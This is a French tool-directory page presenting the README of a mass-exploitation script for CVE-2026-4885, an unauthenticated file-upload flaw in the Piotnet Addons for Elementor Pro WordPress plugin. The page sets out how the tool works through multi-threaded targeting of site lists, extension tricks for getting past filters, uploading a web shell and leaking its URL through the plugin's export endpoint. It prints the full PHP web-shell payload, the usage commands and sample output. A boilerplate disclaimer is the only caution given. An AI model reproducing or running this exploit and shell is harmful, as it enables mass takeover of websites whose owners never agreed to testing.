Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - Téléchargement arbitraire de fichier non authentifié via le téléchargement de fichier de formulaire | Kitploit
Outils/GitHubGitHub/jenderal92/cve-2026-4885
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - Téléchargement arbitraire de fichier non authentifié via le téléchargement de fichier de formulaire

Voir le dépôt
5il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-4885 – Exploitation massive de Piotnet Addons for Elementor Pro

Téléchargement arbitraire de fichier sans authentification menant à une exécution de code à distance (RCE) dans Piotnet Addons for Elementor Pro ≤ 7.1.70.

Cet outil est conçu pour l'exploitation massive – fournissez-lui une liste de cibles, et il effectuera automatiquement :

  • Détecter la version du plugin (ou supposer vulnérable si des ressources sont trouvées)
  • Effectuer une reconnaissance avancée pour extraire post_id, form_id et le nom de champ de téléchargement correct
  • Essayer plusieurs extensions PHP (.phtml, .php3, .php4, .phps, .pht, .php2) pour contourner les filtres faibles
  • Télécharger un shell PHP à en-tête GIF89a (intégré, aucun fichier externe nécessaire)
  • Divulguer l'URL du shell téléchargé via pafe_export_database
  • Vérifier l'exécution du shell (recherche la chaîne Logic_Internet) et enregistrer l'URL dans shells.txt

⚠️ Avertissement
Cet outil est réservé aux tests de sécurité éducatifs et autorisés.
Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire est illégale.

Vous pouvez consulter l'avertissement complet sur la couverture de Jenderal92. Vérifiez-le ICI !!!


Fonctionnalités

  • Compatible Python 2.7 (fonctionne aussi avec Python 3 si vous ajustez print/input)
  • Multi‑threadé – analyse et exploite jusqu'à 20 cibles simultanément
  • Détection intelligente de formulaire – analyse les attributs HTML spécifiques à Piotnet (data-pafe-form-builder-field-name, data-elementor-id, etc.)
  • Aucun fichier shell externe – la charge utile PHP est intégrée dans le script
  • Schéma d'URL automatique – ajoute https:// si manquant
  • Liste de chemins étendue – inclut 22 URLs de formulaire courantes (/contact, /apply, /quote, /book-appointment, …)
  • Motif de divulgation – correspond à la fois à wp-content/uploads/piotnet-addons-for-elementor/ et aux chemins racine directs

Prérequis

  • Python 2.7 (ou Python 3 avec modifications mineures)
  • Bibliothèque requests
pip install requests

Installation

git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885

Utilisation

  1. Préparer un fichier de cibles

Créez un fichier nommé targets.txt (ou tout autre nom) avec une URL par ligne :

https://example1.com
example2.com
http://vulnerable-site.org
  1. Exécuter l'exploit
python2 CVE-2026-4885.py targets.txt

Le script :

· Afficher la progression pour chaque cible · Enregistrer les URLs de shell réussies dans shells.txt

Exemple de sortie

[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml

Options de ligne de commande (personnalisables dans le script)

Variable Description Valeur par défaut TIMEOUT Délai d'expiration de la requête HTTP 10 secondes MAX_THREADS Nombre de threads simultanés 20 OUTPUT_FILE Où enregistrer les URLs de shell réussies shells.txt EXT_LIST Extensions de fichiers à essayer .phtml, .php3, .php4, .phps, .pht, .php2

Vous pouvez les modifier en éditant le début du script.


Charge utile du shell

La charge utile intégrée est :

GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
    move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
    Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>

· Affiche les informations du serveur, le répertoire de travail actuel et un formulaire de téléchargement de fichier. · Peut être remplacé par tout autre code PHP (modifiez simplement SHELL_CODE dans le script).


Fonctionnement

  1. Détection de version · Recherche sur la page d'accueil la présence de ?ver= dans les ressources du plugin. · Repli sur la vérification de l'existence de fichiers CSS/JS connus.
  2. Reconnaissance · Parcourt les pages de formulaire courantes et tous les liens internes trouvés sur la page d'accueil. · Extrait post_id, form_id et le nom du champ de téléchargement de fichier correct à partir des attributs HTML spécifiques à Piotnet.
  3. Téléchargement · Envoie une requête POST multipart à wp-admin/admin-ajax.php?action=pafe_ajax_form_builder. · Utilise une charge utile JSON qui imite le mécanisme de téléchargement du plugin. · Essaie toutes les extensions dans EXT_LIST jusqu'à ce qu'une réussisse.
  4. Divulgation · Envoie une requête à pafe_export_database qui retourne un CSV contenant l'URL complète du fichier téléchargé. · Analyse l'URL à l'aide d'une expression régulière correspondant à xxx-{random}.ext.
  5. Vérification · Visite l'URL divulguée. · Vérifie la présence de la chaîne Logic_Internet. · Enregistre l'URL dans shells.txt en cas de succès.

Dépannage

UnicodeEncodeError sur Windows

Le script inclut déjà une fonction safe_unicode() qui gère les caractères non ASCII. Si vous voyez encore des erreurs, assurez-vous que votre terminal prend en charge UTF‑8 :

chcp 65001

Aucun formulaire trouvé / Toutes les extensions échouent

· La cible peut être patchée ou ne pas utiliser Piotnet Addons. · Essayez d'augmenter TIMEOUT ou MAX_THREADS. · Vérifiez manuellement que le plugin est réellement installé.

La divulgation échoue mais le téléchargement a réussi

· Le point de terminaison pafe_export_database peut être désactivé ou protégé. · Essayez d'accéder manuellement à /wp-admin/admin-ajax.php?action=pafe_export_database dans un navigateur pour voir s'il est accessible.


Utilisation légale et éthique

· Utilisez cet outil uniquement sur des systèmes pour lesquels vous avez une autorisation écrite de test. · L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés. · Respectez toutes les lois applicables.

Télécharger l’outil